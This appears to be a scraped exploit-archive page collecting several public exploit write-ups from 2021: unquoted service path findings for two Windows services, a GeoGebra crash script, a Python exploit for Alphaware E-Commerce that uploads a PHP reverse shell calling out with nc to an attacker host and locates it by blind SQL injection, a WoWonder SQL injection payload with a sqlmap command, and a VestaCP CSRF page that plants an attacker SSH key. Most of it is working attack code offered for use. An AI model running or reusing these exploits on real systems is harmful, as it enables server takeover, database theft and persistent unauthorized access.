# Exploit Title: Interactive Suite 3.6 - 'eBeam Stylus Driver' Unquoted Service Path # Discovery by: Luis Martinez # Discovery Date: 2021-03-14 # Vendor Homepage: https://www.luidia.com # Software Link: http://down.myequil.com/dn/setup/ScrapBook_win/down.html # Tested Version: 3.6 # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "eBeam" | findstr /i /v """ eBeam Stylus Driver eBeam Stylus Driver C:\Program Files (x86)\Luidia\eBeam Stylus Driver\eBeam_Stylus_Driver.exe Auto # Service info: C:\>sc qc "eBeam Stylus Driver" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: eBeam Stylus Driver TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Luidia\eBeam Stylus Driver\eBeam_Stylus_Driver.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : eBeam Stylus Driver DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
HireHackking

GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC)

HACKER · %s · %s

# Exploit Title: GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC) # Date: 2021-03-15 # Exploit Author: Brian Rodriguez # Vendor Homepage: https://www.geogebra.org # Software Link: https://www.geogebra.org/download # Version: 5.0.631.0-d # Tested on: Windows 8.1 Pro #STEPS # Open the program GeoGebra # Run the python exploit script payload.py, it will create a new payload.txt file # Copy the content of the file "payload.txt" # Paste the content in the field "Entrada:" # Crashed --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 800000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")
HireHackking
# Exploit Title: Alphaware E-Commerce System 1.0 - Unauthenicated Remote Code Execution (File Upload + SQL injection) # Date: 15-03-2021 # Exploit Author: Christian Vierschilling # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/11676/alphaware-simple-e-commerce-system.html # Software Download: https://www.sourcecodester.com/download-code?nid=11676&title=Alphaware+-+Simple+E-Commerce+System+using+PHP+with+Source+Code # Version: 1.0 # Tested on: PHP 7.4.14, Linux x64_x86 # --- Description --- # # The web application allows for an unauthenticated file upload which can result in a Remote Code Execution. # We combine this issue with an sql injection to retrieve the randomised name of our uploaded php shell. # --- Proof of concept --- # #!/usr/bin/python3 import random import sys import requests from requests_toolbelt.multipart.encoder import MultipartEncoder def file_upload(target_ip, attacker_ip, attacker_port): random_number = str(random.randint(100000000,999999999)) file_name = "SHELL.php" revshell_string = '<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f"); ?>'.format(attacker_ip, attacker_port) m = MultipartEncoder(fields={'add': '', 'product_image': (file_name, revshell_string, 'application/x-php'),'product_code':random_number,'product_name':'R3v_5H3LL','product_price':'123','product_size':'99','brand':'N0_name','category':'Hackers','qty':'1'}) print("(+) Uploading php reverse shell file ..") r1 = requests.post('http://{}/alphaware/admin/admin_football.php'.format(target_ip), data=m, headers={'Content-Type': m.content_type}) return random_number def trigger_shell_sqli(target_ip,product_id): target_file_name = '' url = 'http://{}/alphaware/function/admin_login.php'.format(target_ip) print("(+) Now setting up our sqli for file name guessing ..") # STEP 1: Get length of target column in database .. for i in range(1, 200): payload = {'enter':'','username':"' or {}=(select char_length(product_image) from product where product_id = {})#".format(i, product_id)} r2 = requests.post(url, data=payload, allow_redirects=False) # STEP 2: successful sqli will be indicated by a redirect.. setting up our blind based file name guessing. :-) if str(r2.status_code) == '302': print("(+) Initial sqli successful, got length of our target file name!") print("(+) Now for the filename.. ", end = '') for j in range(1, i+1): for brutechar in range(32, 126): payload = {'enter':'','username':"' or '{}'=(SELECT substring((SELECT product_image from product where product_id = {}),{},1))#".format(chr(brutechar),product_id,j)} r3 = requests.post(url, data=payload, allow_redirects=False) if str(r3.status_code) == '302': target_file_name = target_file_name + chr(brutechar) print(chr(brutechar), end = '') sys.stdout.flush() break url = 'http://{}/alphaware/photo/{}.php'.format(target_ip,target_file_name.split('.')[0]) print("\r\n(+) Trying to trigger shell by requesting {} ..".format(url)) r4 = requests.get(url) def main(): if len(sys.argv) != 4: print('(+) usage: %s <target ip> <attacker ip> <attacker port>' % sys.argv[0]) print('(+) eg: %s 10.0.0.1 10.13.37.10 4444' % sys.argv[0]) sys.exit(-1) target_ip = sys.argv[1] attacker_ip = sys.argv[2] attacker_port = sys.argv[3] product_id = file_upload(target_ip, attacker_ip, attacker_port) trigger_shell_sqli(target_ip, product_id) print("(+) done!") if __name__ == "__main__": main()
HireHackking

WoWonder Social Network Platform 3.1 - 'event_id' SQL Injection

HACKER · %s · %s

# Exploit Title: WoWonder Social Network Platform 3.1 - 'event_id' SQL Injection # Date: 16.03.2021 # Exploit Author: securityforeveryone.com # Author Mail: hello[AT]securityforeveryone.com # Vendor Homepage: https://www.wowonder.com/ # Software Link: https://codecanyon.net/item/wowonder-the-ultimate-php-social-network-platform/13785302 # Version: < 3.1 # Tested on: Linux/Windows DESCRIPTION In WoWonder < 3.1, remote attackers can gain access to the database by exploiting a SQL Injection vulnerability via the event_id parameter. The vulnerability is found in the "event_id" parameter in GET request sent to page requests.php. Example: /requests.php?hash=xxxxxxxxxxx&f=search-my-followers&filter=s4e&event_id=EVENT_ID if an attacker exploits this vulnerability, attacker may access private data in the database system. EXPLOITATION # GET /requests.php?hash=xxxxxxxxxxx&f=search-my-followers&filter=s4e&event_id=EVENT_ID HTTP/1.1 # Host: Target Sqlmap command: sqlmap -r request.txt --risk 3 --level 5 --random-agent -p event_id --dbs Payload: f=search-my-followers&s=normal&filter=s4e&event_id=1') AND 5376=5376-- QYxF
HireHackking

VFS for Git 1.0.21014.1 - 'GVFS.Service' Unquoted Service Path

HACKER · %s · %s

# Exploit Title: VFS for Git 1.0.21014.1 - 'GVFS.Service' Unquoted Service Path # Date: 2021-2-6 # Exploit Author: Mohammed Alshehri # Vendor Homepage: https://vfsforgit.org/ # Software Link: https://github.com/microsoft/VFSForGit/releases/download/v1.0.21014.1/SetupGVFS.1.0.21014.1.exe # Version: 1.0.21014.1 # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 # Service info: C:\Users\m507>sc qc GVFS.Service [SC] QueryServiceConfig SUCCESS SERVICE_NAME: GVFS.Service TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\GVFS\GVFS.Service.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : GVFS.Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\m507> # Exploit: This vulnerability could permit executing code during startup or reboot with the escalated privileges.
HireHackking

VestaCP 0.9.8 - File Upload CSRF

HACKER · %s · %s

# Exploit Title: VestaCP 0.9.8 - File Upload CSRF # Exploit Author: Fady Othman # Date: 16-03-2021 # Vendor Homepage: https://vestacp.com/ # Software Link: https://github.com/myvesta/vesta # Version: Vesta Control Panel (aka VestaCP) through 0.9.8-27 and myVesta through 0.9.8-26-39 # CVE ID: CVE-2021-28379 # Patch: https://github.com/myvesta/vesta/commit/3402071e950e76b79fa8672a1e09b70d3860f355 ## Description I found that the checks performed by the upload functionality are insufficient, the upload functionality is vulnerable to CSRF, in addition it allows uploading files and creating folders under "/tmp" and under the home folder (usually "/home/admin"), the later is the one that is important for this exploit to work. I was able to use this to create a ".ssh" folder in the admin home and upload "authorized_keys" file which allowed me to access the server later as "admin" using SSH. Since this relies on a *CSRF* the admin has to visit a link, please note that *sshd* is already installed by *VestaCP* when using the default installation script so no need to install it, also please note that files can be replaced so even if the admin has already added "authorized_keys" file, it will be replaced with the attacker's file. Affected endpoint: "/upload/index.php", i.e. "/upload/index.php?dir=/home/admin/.ssh/" ## Steps to reproduce. 1. Install the latest version of VestaCP in your machine by following the instructions at https://vestacp.com/install/. 2. Login as the admin in Firefox, then open "exploit.html". 3. ssh into the machine using 'ssh -i id_rsa admin@victimmachine', now you have access as admin. # exploit.html <html> <head> <script> function exploit() { var mystring = `ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCnXyu8AsFjbuE5YMUa74PrNkO9coGWnw59v/cSVMgOZVpx+UziT0BRFurhVkyujTCXdz6OlN4yFZjCVMbAgZ7/liNu9ecGSGNcUTC+Br5YawlG9QICEaJ/bK32+luKdM1c5ONbRby+ARFsC9+iZu6IkAPnSRntbNgDZpuej/cKfm85EnvdQPAijvs4+899w2+rGvhSQ0wH4l1KNlV1yVoAsg0PFYGDnbygGA5Eo4k9LHwa2Hsm5b2Q5GhqlEUCgYFOjScuORczwhctVtp4VWKXiFoMLJupNhot/OqUXkoNgE6UUd75XcLNGMBiyfLpfXO2u1sGsw5nTiKvNn+1YdC7AKHWBjxl3wDY8hMf/gcveV4Nh45mMUu0p6kptDdVhELeeys8euHiTWOk+FLCKkps9eLiyl8gQUfWcFVj0dgqYVJne2S1U33wnofRhj0fGWAJf14xHhwnTi7u58u+0U1NJchOTHAaeX1Swqk2J34Ny9GwD01a71DFIIcIbgcef6c= fady@fady-Lenovo-Legion-Y530-15ICH-1060`; var fileContent = new Blob([mystring], { type: 'text/plain' }); myFormData = new FormData(); myFormData.append("files", fileContent, "authorized_keys"); fetch("https://localhost:8083/upload/index.php?dir=/home/admin/.ssh/", { method: "post", body: myFormData, credentials: "include" }); } </script> </head> <body onload="exploit();"> </body> </html>